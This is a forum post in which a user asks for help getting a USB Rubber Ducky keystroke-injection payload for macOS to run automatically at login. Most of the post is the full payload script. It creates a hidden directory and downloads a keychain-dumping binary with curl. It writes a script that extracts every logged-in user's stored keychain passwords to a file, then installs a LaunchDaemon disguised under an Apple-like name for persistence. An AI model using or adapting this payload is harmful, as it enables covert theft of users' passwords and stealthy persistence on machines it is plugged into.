Jump to content

IsaiahJTurner

Members
  • Posts

    4
  • Joined

  • Last visited

Posts posted by IsaiahJTurner

  1. I was trying to take advantage of a project called KeychainDump that extracts OS X Keychain decryption keys from RAM to dump passwords but am having an issue. First off, the source can be found on https://github.com/IsaiahJTurner/duckdump I compiled the keychaindump binary myself but feel free to compile it on your own if you don't trust mine. The issue I am having is that OS X launchd never seems to run. If I run the script manually, it works, but I wan't it to run automatically as soon as the user logs in. Any help?

    Partially Inspired By: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor

    REM Isaiah Turner
    REM This tool will automatically dump all passwords stored in the keychain to a file on the desktop upon login.
    REM Please do not use this for evil, this is for educational purposes only.
    REM http://isaiahjturner.com
    DELAY 1000
    STRING mount -uw /
    ENTER
    DELAY 2000
    STRING mkdir /Library/.hidden
    ENTER
    DELAY 200
    
    STRING echo '#!/bin/sh
    ENTER
    STRING curl -o /Library/.hidden/keychaindump 'https://raw.githubusercontent.com/IsaiahJTurner/keychaindump/master/keychaindump'
    ENTER
    STRING chmod +x /Library/.hidden/keychaindump
    ENTER
    STRING w -h | sort -u -t'"' '"' -k1,1 | while read user etc
    ENTER
    STRING do
    ENTER
    STRING homedir=$(dscl . -read /Users/$user NFSHomeDirectory | cut -d'"' '"' -f2)
    ENTER
    STRING /Library/.hidden/keychaindump $homedir/Library/Keychains/login.keychain > $homedir/Desktop/$user.login.keychain.txt
    ENTER
    STRING done' > /Library/.hidden/dump.sh
    ENTER
    DELAY 500
    
    
    STRING chmod +x /Library/.hidden/dump.sh
    ENTER
    DELAY 200
    
    
    STRING mkdir /Library/LaunchDaemons
    ENTER
    DELAY 200
    
    
    STRING echo '<plist version="1.0">
    ENTER
    STRING <dict>
    ENTER
    STRING <key>Label</key>
    ENTER
    STRING <string>com.apples.services</string>
    ENTER
    STRING <key>ProgramArguments</key>
    ENTER
    STRING <array>
    ENTER
    STRING <string>/bin/sh</string>
    ENTER
    STRING <string>/Library/.hidden/dump.sh</string>
    ENTER
    STRING </array>
    ENTER
    STRING <key>RunAtLoad</key>
    ENTER
    STRING <true/>
    ENTER
    STRING <key>AbandonProcessGroup</key>
    ENTER
    STRING <true/>
    ENTER
    STRING </dict>
    ENTER
    STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
    ENTER
    DELAY 500
    
    
    STRING chmod 644 /Library/LaunchDaemons/com.apples.services.plist
    ENTER
    DELAY 200
    
    
    STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
    
×
×
  • Create New...